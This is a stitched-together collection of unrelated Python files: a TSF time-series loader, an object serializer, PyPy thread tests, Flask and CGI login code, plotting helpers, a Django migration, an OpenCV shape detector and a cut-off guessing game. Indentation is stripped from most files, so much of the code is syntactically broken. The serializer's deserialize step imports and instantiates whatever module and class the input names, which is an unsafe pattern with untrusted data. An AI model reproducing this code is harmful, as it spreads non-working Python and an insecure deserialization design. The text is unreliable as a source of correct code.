line_content = line.split(" ")
if line.startswith("@attribute"):
if len(line_content) != 3: # Attributes have both name and type
raise ValueError("Invalid meta-data specification.")
col_names.append(line_content[1])
col_types.append(line_content[2])
else:
if len(line_content) != 2: # Other meta-data have only values
raise ValueError("Invalid meta-data specification.")
if line.startswith("@frequency"):
frequency = line_content[1]
elif line.startswith("@horizon"):
forecast_horizon = int(line_content[1])
elif line.startswith("@missing"):
contain_missing_values = bool(strtobool(line_content[1]))
elif line.startswith("@equallength"):
contain_equal_length = bool(strtobool(line_content[1]))
else:
if len(col_names) == 0:
raise ValueError("Missing attribute section. Attribute section must come before data.")
found_data_tag = True
elif not line.startswith("#"):
if len(col_names) == 0:
raise ValueError("Missing attribute section. Attribute section must come before data.")
elif not found_data_tag:
raise ValueError("Missing @data tag.")
else:
if not started_reading_data_section:
started_reading_data_section = True
found_data_section = True
all_series = []
for col in col_names:
all_data[col] = []
full_info = line.split(":")
if len(full_info) != (len(col_names) + 1):
raise ValueError("Missing attributes/values in series.")
series = full_info[len(full_info) - 1]
series = series.split(",")
if len(series) == 0:
raise ValueError(
"A given series should contains a set of comma separated numeric values. At least one numeric value should be there in a series. Missing values should be indicated with ? symbol"
)
numeric_series = []
for val in series:
if val == "?":
numeric_series.append(replace_missing_vals_with)
else:
numeric_series.append(float(val))
if numeric_series.count(replace_missing_vals_with) == len(numeric_series):
raise ValueError(
"All series values are missing. A given series should contains a set of comma separated numeric values. At least one numeric value should be there in a series."
)
all_series.append(np.array(numeric_series, dtype=np.float32))
for i in range(len(col_names)):
att_val = None
if col_types[i] == "numeric":
att_val = int(full_info[i])
elif col_types[i] == "string":
att_val = str(full_info[i])
elif col_types[i] == "date":
att_val = datetime.strptime(full_info[i], "%Y-%m-%d %H-%M-%S")
else:
raise ValueError(
"Invalid attribute type."
) # Currently, the code supports only numeric, string and date types. Extend this as required.
if att_val is None:
raise ValueError("Invalid attribute value.")
else:
all_data[col_names[i]].append(att_val)
line_count = line_count + 1
if line_count == 0:
raise ValueError("Empty file.")
if len(col_names) == 0:
raise ValueError("Missing attribute section.")
if not found_data_section:
raise ValueError("Missing series information under data section.")
all_data[value_column_name] = all_series
loaded_data = pd.DataFrame(all_data)
return (
loaded_data,
frequency,
forecast_horizon,
contain_missing_values,
contain_equal_length,
)
def convert_multiple(text: str) -> str:
    if text.isnumeric():
        return text
    if text == "half":
        return "0.5"
    raise ValueError(f"Invalid multiple '{text}' in frequency string.")
def frequency_converter(freq: str):
parts = freq.split("_")
if len(parts) == 1:
return BASE_FREQ_TO_PANDAS_OFFSET[parts[0]]
if len(parts) == 2:
return convert_multiple(parts[0]) + BASE_FREQ_TO_PANDAS_OFFSET[parts[1]]
raise ValueError(f"Invalid frequency string {freq}.")
BASE_FREQ_TO_PANDAS_OFFSET = {
"seconds": "S",
"minutely": "T",
"minutes": "T",
"hourly": "H",
"hours": "H",
"daily": "D",
"days": "D",
"weekly": "W",
"weeks": "W",
"monthly": "M",
"months": "M",
"quarterly": "Q",
"quarters": "Q",
"yearly": "Y",
"years": "Y",
}
# Example of usage
# loaded_data, frequency, forecast_horizon, contain_missing_values, contain_equal_length = convert_tsf_to_dataframe("TSForecasting/tsf_data/sample.tsf")
# print(loaded_data)
# print(frequency)
# print(forecast_horizon)
# print(contain_missing_values)
# print(contain_equal_length)
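# frequency_converter examples (a sketch):
#   frequency_converter("daily")        -> "D"
#   frequency_converter("half_hourly")  -> "0.5H"
#   frequency_converter("4_seconds")    -> "4S"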
|
import re

from .baseserializer import BaseSerializer
class ObjectSerializer(BaseSerializer):
def __init__(self, obj_types, class_identifiers_in_params=False):
        super().__init__(obj_types, r'^!Class\((([a-zA-Z_][0-9a-zA-Z_]*)\.([a-zA-Z_][0-9a-zA-Z_]*))?\)$')
self.class_identifiers_in_params = class_identifiers_in_params
def serialize(self, obj):
if self.class_identifiers_in_params is True:
result = {
'!Class()': {
'__module__': obj.__module__,
'__class__': obj.__class__.__name__,
**obj.__dict__
}
}
else:
result = { '!Class({}.{})'.format(obj.__module__, obj.__class__.__name__, ): { **obj.__dict__ } }
return result
def deserialize(self, serialized_obj):
        # structure should be like this: { '!Class(Module.Class)': { ... params ... } } so only one item in the dict
        try:
            k, v = list(serialized_obj.items())[0]
        except (AttributeError, IndexError):
            return serialized_obj
r = re.match(self.id_regex, k)
if not r:
return serialized_obj
if r.groups()[0] is None and '__class__' in v and '__module__' in v:
module_name = v.pop("__module__")
class_name = v.pop("__class__")
        elif r.groups()[0] is not None and r.groups()[1] is not None and r.groups()[2] is not None:
            module_name = r.groups()[1]
            class_name = r.groups()[2]
        else:
            return serialized_obj
        module = __import__(module_name, fromlist=[class_name])  # fromlist resolves dotted module paths
cls = getattr(module, class_name)
obj = cls(**v)
return obj
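# Round-trip sketch (assumes BaseSerializer just stores obj_types and the id
# regex, and that the target class accepts its attributes as kwargs):
#
#   s = ObjectSerializer(obj_types=[Point])    # Point is a hypothetical class
#   data = s.serialize(Point(x=1, y=2))        # {'!Class(mymod.Point)': {'x': 1, 'y': 2}}
#   obj = s.deserialize(data)                  # reconstructs Point(x=1, y=2)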
|
from pypy.module.thread.test.support import GenericTestThread
class AppTestLocal(GenericTestThread):
def test_local_1(self):
import thread
from thread import _local as tlsobject
freed = []
class X:
def __del__(self):
freed.append(1)
ok = []
TLS1 = tlsobject()
TLS2 = tlsobject()
TLS1.aa = "hello"
def f(i):
success = False
try:
a = TLS1.aa = i
b = TLS1.bbb = X()
c = TLS2.cccc = i*3
d = TLS2.ddddd = X()
self.busywait(0.05)
assert TLS1.aa == a
assert TLS1.bbb is b
assert TLS2.cccc == c
assert TLS2.ddddd is d
success = True
finally:
ok.append(success)
for i in range(20):
thread.start_new_thread(f, (i,))
self.waitfor(lambda: len(ok) == 20, delay=3)
assert ok == 20*[True] # see stdout/stderr for failures in the threads
self.waitfor(lambda: len(freed) >= 40)
assert len(freed) == 40
# in theory, all X objects should have been freed by now. Note that
# Python's own thread._local objects suffer from the very same "bug" that
# tls.py showed originally, and leaves len(freed)==38: the last thread's
# __dict__ remains stored in the TLS1/TLS2 instances, although it is not
# really accessible any more.
assert TLS1.aa == "hello"
def test_local_init(self):
import thread
tags = [1, 2, 3, 4, 5, 54321]
seen = []
class X(thread._local):
def __init__(self, n):
assert n == 42
self.tag = tags.pop()
x = X(42)
assert x.tag == 54321
def f():
seen.append(x.tag)
for i in range(5):
thread.start_new_thread(f, ())
self.waitfor(lambda: len(seen) == 5, delay=2)
seen1 = seen[:]
seen1.sort()
assert seen1 == [1, 2, 3, 4, 5]
assert tags == []
def test_local_setdict(self):
import thread
x = thread._local()
raises(TypeError, "x.__dict__ = 42")
done = []
def f(n):
x.spam = n
assert x.__dict__["spam"] == n
x.__dict__ = {"bar": n+1}
assert x.bar == n+1
assert not hasattr(x, "spam")
done.append(1)
for i in range(5):
thread.start_new_thread(f, (i,))
self.waitfor(lambda: len(done) == 5, delay=2)
assert len(done) == 5
|
# -*- coding: utf-8 -*-
from flask import Flask
from flask_socketio import SocketIO
from services import facial_recognition, brightness_detector, face_detector, object_detector, pose_estimation
import configparser
config = configparser.ConfigParser()
config.read("secret.ini")
app = Flask(__name__)
PORT = config.get("APP", "PORT")
DEBUG = config.get("APP", "DEBUG") == "True"
app.config["SECRET_KEY"] = config.get("APP", "SECRET_KEY")
socketio = SocketIO(app)
@socketio.on("face verification")
def face_verification(image1, image2):
try:
response = facial_recognition.facial_verification_for_auth(
image1=image1, image2=image2
)
return response
    except Exception:
return False
@socketio.on("brightness detector")
def brightness_validator(image):
try:
response = brightness_detector.detect_brightness(image)
return response
    except Exception:
return False
@socketio.on("face detector")
def face_detection(image):
try:
response = face_detector.face_detector(image)
return response
    except Exception:
return False, "No face is detected"
@socketio.on("object detector")
def object_detection(image):
try:
# response = object_detector.object_detection(image)
return False
    except Exception:
return False
@socketio.on("pose detector")
def pose_detection(image):
try:
response = pose_estimation.pose_estimation(image)
print(response)
return response
    except Exception:
return True, ""
if __name__ == "__main__":
socketio.run(app, debug=DEBUG, port=PORT) |
# -*- coding: utf-8 -*-
"""Convenience visual methods"""
import numpy as np
import matplotlib.pyplot as plt
def imshow(data, title=None, show=1, cmap=None, norm=None, complex=None, abs=0,
w=None, h=None, ridge=0, ticks=1, yticks=None, aspect='auto', **kw):
kw['interpolation'] = kw.get('interpolation', 'none')
if norm is None:
mx = np.max(np.abs(data))
vmin, vmax = ((-mx, mx) if not abs else
(0, mx))
else:
vmin, vmax = norm
if cmap is None:
cmap = 'bone' if abs else 'bwr'
_kw = dict(vmin=vmin, vmax=vmax, cmap=cmap, aspect=aspect, **kw)
if abs:
plt.imshow(np.abs(data), **_kw)
else:
if (complex is None and np.sum(np.abs(np.imag(data))) < 1e-8) or (
complex is False):
plt.imshow(data.real, **_kw)
else:
fig, axes = plt.subplots(1, 2)
axes[0].imshow(data.real, **_kw)
            axes[1].imshow(data.imag, **_kw)
plt.subplots_adjust(left=0, right=1, bottom=0, top=1,
wspace=0, hspace=0)
if w or h:
plt.gcf().set_size_inches(14 * (w or 1), 8 * (h or 1))
if ridge:
data_mx = np.where(np.abs(data) == np.abs(data).max(axis=0))
plt.scatter(data_mx[1], data_mx[0], color='r', s=4)
if not ticks:
plt.xticks([])
plt.yticks([])
if yticks is not None:
idxs = np.linspace(0, len(yticks) - 1, 8).astype('int32')
yt = ["%.2f" % h for h in yticks[idxs]]
plt.yticks(idxs, yt)
_maybe_title(title)
if show:
plt.show()
def plot(x, y=None, title=None, show=0, ax_equal=False, complex=0,
w=None, h=None, **kw):
if y is None:
y = x
x = np.arange(len(x))
if complex:
plt.plot(x, y.real, **kw)
plt.plot(x, y.imag, **kw)
else:
plt.plot(x, y, **kw)
_maybe_title(title)
_scale_plot(plt.gcf(), plt.gca(), show=show, ax_equal=ax_equal, w=w, h=h)
def scat(x, y=None, title=None, show=0, ax_equal=False, s=18, w=None, h=None,
**kw):
if y is None:
y = x
x = np.arange(len(x))
plt.scatter(x, y, s=s, **kw)
_maybe_title(title)
_scale_plot(plt.gcf(), plt.gca(), show=show, ax_equal=ax_equal, w=w, h=h)
def hist(x, bins=500, title=None, show=0, stats=0):
x = np.asarray(x)
_ = plt.hist(x.ravel(), bins=bins)
_maybe_title(title)
if show:
plt.show()
if stats:
mu, std, mn, mx = (x.mean(), x.std(), x.min(), x.max())
print("(mean, std, min, max) = ({}, {}, {}, {})".format(
*_fmt(mu, std, mn, mx)))
return mu, std, mn, mx
def _fmt(*nums):
return [(("%.3e" % n) if (abs(n) > 1e3 or abs(n) < 1e-3) else
("%.3f" % n)) for n in nums]
def _maybe_title(title):
if title is not None:
plt.title(str(title), loc='left', weight='bold', fontsize=15)
def _scale_plot(fig, ax, show=False, ax_equal=False, w=None, h=None):
xmin, xmax = ax.get_xlim()
rng = xmax - xmin
ax.set_xlim(xmin + .018 * rng, xmax - .018 * rng)
if w or h:
fig.set_size_inches(14*(w or 1), 8*(h or 1))
if ax_equal:
yabsmax = max(np.abs([*ax.get_ylim()]))
mx = max(yabsmax, max(np.abs([xmin, xmax])))
ax.set_xlim(-mx, mx)
ax.set_ylim(-mx, mx)
fig.set_size_inches(8*(w or 1), 8*(h or 1))
if show:
plt.show()
def plotenergy(x, axis=1, **kw):
plot(np.sum(np.abs(x) ** 2, axis=axis), **kw)
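# Quick demo of the helpers above (a sketch):
#   imshow(np.random.randn(64, 64), title='noise', abs=1)
#   plot(np.sin(np.linspace(0, 10, 200)), title='sine', show=1)
#   hist(np.random.randn(10000), title='gaussian', show=1, stats=1)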
|
import sys
import json
sys.path.insert(0, '../osspeak')
from recognition.rules import astree, _lark
from recognition import lark_parser
def test_hello_world():
text = 'hello world'
def test_top_level_grouping():
text = 'hello world | goodbye universe'
def test_reference():
text = 'a number <digit>'
def test_range():
text = 'hello_3-5'
def test_fixed_repetition():
text = 'hello_3'
def test_nested_grouping():
text = 'hello world | goodbye (universe | solar system)'
def test_action_substitute2():
text = "question = how are you | fruit = i like apples"
utterance = utterance_from_text(text)
assert_equal(utterance, {
"root": {
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"sequences": [
[
{
"action_substitute": {
"type": "Literal",
"value": "how are you"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "question",
"type": "WordNode"
},
],
[
{
"action_substitute": {
"type": "Literal",
"value": "i like apples"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "fruit",
"type": "WordNode"
},
]
],
"type": "GroupingNode"
},
"type": "Rule"
})
def test_action_substitute():
text = "go to (google='http://google.com' | reddit='http://reddit.com')"
utterance = utterance_from_text(text)
assert_equal(utterance, {
"root": {
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"sequences": [
[
{
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"text": "go",
"type": "WordNode"
},
{
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"text": "to",
"type": "WordNode"
},
{
"action_substitute": None,
"repeat_high": 1,
"repeat_low": 1,
"sequences": [
[
{
"action_substitute": {
"type": "String",
"value": "http://google.com"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "google",
"type": "WordNode"
}
],
[
{
"action_substitute": {
"type": "String",
"value": "http://reddit.com"
},
"repeat_high": 1,
"repeat_low": 1,
"text": "reddit",
"type": "WordNode"
}
]
],
"type": "GroupingNode"
}
]
],
"type": "GroupingNode"
},
"type": "Rule"
})
def pretty(d, indent=0):
for key, value in d.items():
print('\t' * indent + str(key))
if isinstance(value, dict):
pretty(value, indent+1)
else:
print('\t' * (indent+1) + str(value))
def utterance_from_text(text):
lark_ir = lark_parser.parse_utterance(text)
return astree.utterance_from_lark_ir(lark_ir)
def to_clipboard(utterance):
import recognition.actions.library.clipboard
s = to_json_string(utterance)
formatted = to_json_string(json.loads(s))
recognition.actions.library.clipboard.set(formatted.replace('null', 'None').replace('false', 'False').replace('true', 'True'))
def to_json_string(node):
return json.dumps(node, cls=SimpleJsonEncoder, sort_keys=True, indent=4)
def assert_equal(utterance, json_value):
assert json.loads(to_json_string(utterance)) == json_value
class SimpleJsonEncoder(json.JSONEncoder):
def default(self, o):
d = o.__dict__.copy()
d['type'] = o.__class__.__name__
return d |
from . import PresenterBase
# import releases
# from entities import InvalidEntity
products = {
"Recommendation Services": "REPERIO",
"Virtual/Mixed Reality": "KIWANO",
"Content Similarity": "Search & Discovery"
}
class CockpitPresenter(PresenterBase):
    def __init__(self, columns, nice = lambda item: item, sort = (), placeholder = "n/a"):
PresenterBase.__init__(self)
self.available_columns = {
"name": ("Specific Enabler", self.lookup_name),
"avail-fi-ppp": ("availability for the FI-PPP partners", None),
"avail-fi-lab": ("availability within FI-LAB", None),
"avail-3rd-party": ("availability beyond the FI-PPP", None),
"product": ("SE implementation product(s) name(s)", self.lookup_product),
"owner": ("Owner", self.lookup_owners),
"open-source": ("Open Source (Yes/No/Planned)", self.lookup_opensource),
"mode": ("mode", self.lookup_mode),
"last-update": ("date last update", None),
"next-update": ("date next / 1st update", None),
"assets": ("Baseline assets", self.lookup_assets),
"catalog": ("Entry in Catalogue", self.lookup_catalog),
"final-release": ("Final release", lambda se: self.lookup_release('08/15', se)),
"roadmap": ("Roadmap", self.lookup_roadmap)
}
self.columns = [col for col in columns if col in self.available_columns]
self.nice = nice
self.placeholder = placeholder
self.sort = [self.columns.index(col) for col in sort if col in self.columns]
def lookup_release(self, rel, se):
return 'X' if self.final_release.contains_se(se) else ''
def lookup_product(self, se):
id = se.get_name()
if id in products:
return products[id]
return '-'
def lookup_roadmap(self, se):
nc = se.get_naming_conventions()
if nc is None:
return self.placeholder
roadmap = nc.roadmap()
if roadmap is None:
return self.placeholder
return roadmap
# def lookup_availability(self, se):
# return self.currentrelease.contains_se(se)
def lookup_name(self, se):
name = self.nice(se)
if name is None:
return self.placeholder
return name
def lookup_owners(self, se):
owners = se.get('/spec/owners')
if owners is None:
return '[[UNKNOWN OWNER]]'
return ', '.join(owners)
def lookup_status(self, se):
if self.final_release.contains_se(se):
return 'available'
status = se.get('/status')
if status is None:
return self.placeholder
return status
def lookup_assets(self, se):
wiki = se.get('/auto/documentation/wiki-url')
if wiki is None:
return self.placeholder
return wiki
def lookup_catalog(self, se):
# if not self.lookup_availability(se):
# return 'not (yet) available'
nc = se.get_naming_conventions()
if nc is None:
return self.placeholder
return nc.catalogurl()
    def lookup_opensource(self, se):
        is_open = se.get('/auto/license/is-open-source')
        if is_open is None:
            return self.placeholder
        return is_open
def lookup_mode(self, se):
mode = []
if se.get('/auto/license/is-open-source') == 'Yes':
template = se.get('/spec/license/template')
mode.append('open source (%s)' % template)
if se.get('/auto/delivery/hosted-service') == 'Yes':
saas = 'SaaS'
if se.get('/spec/delivery/instances/public') is not None:
saas = 'Global SaaS instance'
elif se.get('/spec/delivery/instances/fi-ppp') is not None:
saas = 'Dedicated SaaS instance'
mode.append(saas)
binary = se.get('/spec/delivery/binary')
if binary is not None:
platforms = ', '.join(binary.keys())
mode.append('binaries (%s)' % platforms)
if len(mode) == 0:
return self.placeholder
return ', '.join(mode)
def present_col(self, se, colname):
if colname not in self.available_columns:
return self.placeholder
col = self.available_columns[colname]
f = col[1]
if f is None:
return self.placeholder
v = f(se)
if v is None:
return self.placeholder
return v
def present_se(self, se):
return [self.present_col(se, colname) for colname in self.columns]
def present(self, meta):
# self.currentrelease = meta.find_current_release()
rels = meta.get_releases()
self.final_release = rels[-1]
self.rows = [self.present_se(se) for se in meta.get_specific_enablers()]
if len(self.sort) > 0:
self.rows.sort(key = lambda row: tuple([row[idx] for idx in self.sort]))
def dump_row(self, out, row, sep = '|'):
        out.write((sep + ' %s ' + sep + '\n') % ((' ' + sep + ' ').join(row)))
def dump(self, out):
headings = [self.available_columns[colname][0] for colname in self.columns]
self.dump_row(out, headings, '^')
for row in self.rows:
self.dump_row(out, row)
|
import jvcr
from route_machine import Scene
class TitleScene(Scene):
def __init__(self) -> None:
self.timer = 0
def on_activate(self):
self.timer = 0
def update(self, dt) -> str:
self.timer += dt
jvcr.spr(0, 0, 0, 48*16, 256, 144, 0, 0, 0)
if self.timer > 10:
return "next"
if self.timer > 0.5 and jvcr.btn(jvcr.BTN_B, 0):
return "next"
|
# -*- coding: utf-8 -*-
from flask import (
    jsonify, request,
    Blueprint
)
from flask_jwt_extended import (
create_access_token, create_refresh_token, current_user,
get_csrf_token, jwt_refresh_token_required, jwt_required,
set_refresh_cookies, set_access_cookies, unset_jwt_cookies,
JWTManager
)
from flask_restplus import Api, Resource
from marshmallow import fields, Schema, validate
from app.models.usuario import UsuarioModel
from app.models.revoked_token import RevokedTokenModel
jwt = JWTManager()
auth_bp = Blueprint('auth', __name__)
# configure authentication identity
# based on the username
@jwt.user_identity_loader
def user_identity_lookup(usuario):
return usuario.usuario
# fetch the current user object
@jwt.user_loader_callback_loader
def user_loader_callback(identity):
return UsuarioModel.query.filter_by(usuario=identity).first()
# error message when the user for a protected endpoint cannot be loaded
@jwt.user_loader_error_loader
def custom_user_loader_error(identity):
ret = {
"message": "User {} not found".format(identity)
}
return jsonify(ret), 401
# check whether the access/refresh token is blacklisted
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return RevokedTokenModel.is_jti_blacklisted(jti)
auth = Api(auth_bp)
class LoginSchema(Schema):
    usuario = fields.Str(required=True, validate=validate.Length(min=6))
senha = fields.Str(required=True)
login_schema = LoginSchema()
@auth.route('/login')
class LoginResource(Resource):
def post(self):
args = login_schema.dump(request.form).data
usuario = UsuarioModel.autenticate(args['usuario'], args['senha'])
if usuario:
            # create the tokens
access_token = create_access_token(usuario)
refresh_token = create_refresh_token(usuario)
            # response with the CSRF tokens
res = jsonify({
'access_csrf': get_csrf_token(access_token),
'refresh_csrf': get_csrf_token(refresh_token)
})
# Set the JWT cookies in the response
set_access_cookies(res, access_token)
set_refresh_cookies(res, refresh_token)
return res
else:
return jsonify({'login': False}), 401
@auth.route('/fresh-login')
class FreshLoginResource(Resource):
def post(self):
        args = login_schema.dump(request.form).data
usuario = UsuarioModel.autenticate(args['usuario'], args['senha'])
if usuario:
access_token = create_access_token(usuario, fresh=True)
res = jsonify({
'access_csrf': get_csrf_token(access_token)
})
set_access_cookies(res, access_token)
return res
else:
return { 'error': 'Usuário ou Senha incorreto' }, 400
@auth.route('/logout')
class LogoutResource(Resource):
@jwt_required
def post(self):
res = jsonify({'logout': True})
unset_jwt_cookies(res)
return res
@auth.route('/refresh')
class RefreshResource(Resource):
@jwt_refresh_token_required
def post(self):
access_token = create_access_token(current_user)
res = jsonify({
'access_csrf': get_csrf_token(access_token)
})
set_access_cookies(res, access_token)
return res
# encapsulate registration of the module
def init_app(app):
app.register_blueprint(auth_bp)
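# Example login request (a sketch: the blueprint mounts at the app root, and
# usuario/senha are the form fields declared in LoginSchema):
#   curl -c cookies.txt -d 'usuario=alice123' -d 'senha=secret' http://localhost:5000/login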
|
#!/usr/bin/env python3
import analyse
import sys
scores = analyse.load_scores()
scores[0].to_csv(sys.argv[1])
scores[1].to_csv(sys.argv[2])
|
import os
import pytest
from ebonite.build.builder.base import use_local_installation
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
# these imports are needed to ensure that these fixtures are available for use
from tests.conftest import has_docker
from tests.ext.test_s3.conftest import s3_artifact, s3server # noqa
from tests.ext.test_sqlalchemy.test_postgres.conftest import postgres_meta, postgres_server # noqa
@pytest.fixture
def remote_ebnt(tmpdir, postgres_server, postgres_meta, s3server, s3_artifact): # noqa
with use_local_installation():
# we reconstruct all objects here to ensure that config-related code is covered by tests
ebnt = Ebonite.custom_client(
metadata="sqlalchemy", meta_kwargs={
"db_uri": postgres_meta.db_uri
},
artifact="s3", artifact_kwargs={
"bucket_name": s3_artifact.bucket_name,
"endpoint": s3_artifact.endpoint,
"region": s3_artifact.region
})
cfg_path = os.path.join(tmpdir, 'config.json')
ebnt.save_client_config(cfg_path)
yield Ebonite.from_config_file(cfg_path)
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(remote_ebnt, 'remote')
def pytest_collection_modifyitems(items, config):
for colitem in items:
if colitem.nodeid.startswith('tests/client/remote.py::'):
colitem.add_marker(pytest.mark.docker)
colitem.add_marker(pytest.mark.skipif(not has_docker(), reason='no docker installed'))
|
# Generated by Django 2.0.9 on 2019-07-19 21:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movement', '0011_auto_20190521_1454'),
]
operations = [
migrations.AlterModelOptions(
name='movementbetweenofficerequest',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de Movimiento entre oficinas', 'verbose_name_plural': 'Requerimientos de Movimientos entre oficinas'},
),
migrations.AlterModelOptions(
name='movementboxcolombia',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de la caja de Colombia', 'verbose_name_plural': 'Movimientos de la caja de Colombia'},
),
migrations.AlterModelOptions(
name='movementdailysquare',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento del Cuadre Diario', 'verbose_name_plural': 'Movimientos del Cuadre Diario'},
),
migrations.AlterModelOptions(
name='movementdonjuan',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de Don Juan', 'verbose_name_plural': 'Movimientos de Don Juan'},
),
migrations.AlterModelOptions(
name='movementdonjuanusd',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de Don Juan', 'verbose_name_plural': 'Movimientos de Don Juan'},
),
migrations.AlterModelOptions(
name='movementoffice',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de la oficina', 'verbose_name_plural': 'Movimientos de la oficina'},
),
migrations.AlterModelOptions(
name='movementpartner',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento del socio', 'verbose_name_plural': 'Movimientos del socio'},
),
migrations.AlterModelOptions(
name='movementprovisioning',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de aprovisionamiento', 'verbose_name_plural': 'Movimientos de aprovisionamiento'},
),
migrations.AlterModelOptions(
name='movementrequest',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de Movimiento', 'verbose_name_plural': 'Requerimientos de movimientos'},
),
migrations.AlterModelOptions(
name='movementwithdraw',
options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de retiro', 'verbose_name_plural': 'Requerimientos de retiro'},
),
migrations.AlterField(
model_name='movementbetweenofficerequest',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementboxcolombia',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementdailysquare',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementdonjuan',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementdonjuanusd',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementoffice',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementpartner',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementprovisioning',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementrequest',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
migrations.AlterField(
model_name='movementwithdraw',
name='balance',
field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'),
),
]
|
class Solution:
def arrayPairSum(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# nums.sort()
# max_sum = 0
# i = 0
# while (i<= len(nums)-1):
# max_sum += nums[i]
# i += 2
# return max_sum
res = [0]*20001
for i in nums:
res[i+10000]+=1
total, flag=0, 0
for idx, freq in enumerate(res):
if freq:
freq-=flag
calc, flag = divmod(freq,2)
total+=(calc+flag)*(idx-10000)
return total
abc = Solution()
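# expected output: 9, since after sorting the pairs (1,2), (3,4), (5,6) contribute min sums 1+3+5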
print (abc.arrayPairSum([1,4,3,2,5,6])) |
#!/usr/bin/env python
'''
------------------------------------------------------------------------------------------
Copyright 2020 Romeo Dabok
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-------------------------------------------------------------------------------------------
Notes: This is just the sign-in (or log-in) script. It grabs the password and username from the form,
runs them through the log-in function, and then sends a script to be executed depending on the result.
'''
#import modules for CGI handling
import cgi
import theroom
# Create instance of FieldStorage
form = cgi.FieldStorage()
gun = form.getvalue('uname')
gpw = form.getvalue('pword')
# Try to log in
pros = theroom.logIn(gun,gpw)
rpage = ""
if pros[0]:
rpage = '''
isLoggedIn = true;
setTimeout("changeRoom('lobby');",10);
''' #% (gun,gpw,pros[1])
#print(pros[2].output())
else:
rpage = '''
var erp1 = document.getElementById('errorplace1');
var erp2 = document.getElementById('errorplace2');
erp1.innerHTML="Username or Password is incorrect";
erp2.innerHTML="Password or Username is incorrect";
'''
print("Content-Type: text/xml\r\n")
print(rpage)
|
#!/usr/bin/env python3
# Contours, shape detection
__author__ = "Cristian Chitiva"
__date__ = "September 12, 2021"
__email__ = "[email protected]"
import cv2
import numpy as np
def getContours(image):
    contours, hierarchy = cv2.findContours(image, mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
print(area)
if area > 500:
cv2.drawContours(imgContour, contours=cnt, contourIdx=-1, color=(255,0,0), thickness=3)
perimeter = cv2.arcLength(curve=cnt, closed=True)
print(perimeter)
approx = cv2.approxPolyDP(curve=cnt, epsilon=0.02*perimeter, closed=True)
objCor = len(approx)
x, y, width, height = cv2.boundingRect(approx)
if objCor == 3:
objType = 'Tri'
elif objCor == 4:
aspRatio = width/float(height)
if aspRatio > 0.95 and aspRatio < 1.05:
objType = 'Square'
else:
objType = 'Rect'
elif objCor > 4:
objType = 'Circle'
else:
objType = 'None'
cv2.rectangle(imgContour, pt1=(x,y), pt2=(x+width,y+height), color=(0,255,0), thickness=2)
cv2.putText(imgContour, text=objType, org=(x+width//2, y+height//2), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0), thickness=2)
# IMAGES
img = cv2.imread('resources/images/shapes.png')
imgContour = img.copy()
imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
imgBlur = cv2.GaussianBlur(imgGray, ksize=(7,7), sigmaX=1)
imgCanny = cv2.Canny(imgBlur, threshold1=50, threshold2=50)
getContours(imgCanny)
cv2.imshow('Original',img)
cv2.imshow('Gray',imgGray)
cv2.imshow('Blur',imgBlur)
cv2.imshow('Canny',imgCanny)
cv2.imshow('Contours',imgContour)
cv2.waitKey(0) |
# Write a program that makes the computer
# "think" of an integer between 0 and 5
# and asks the user to guess which number
# the computer picked. The program should
# print whether the user won or lost.
from random import randint
from emoji import emojize
from time import sleep
# Presentation and interface
print('=*'*20, 'JOGO DA ADIVINHAÇÃO', '=*'*20)
usuário = str(input('Qual seu nome, pequeno gafanhoto?:')).upper().strip()
# Pick the computer's random number
pc = randint(0, 5)
# Anticipating user input errors
escolha = int(input('Pensei em um número de 0 a 5, {}\nDuvido tu acertares!\nR='.format(usuário)))
# Analyzing
print('ANALISANDO...')
sleep(5)
if escolha > 5 or escolha < 0:
    print('Número inválido. Tente Novamente!')
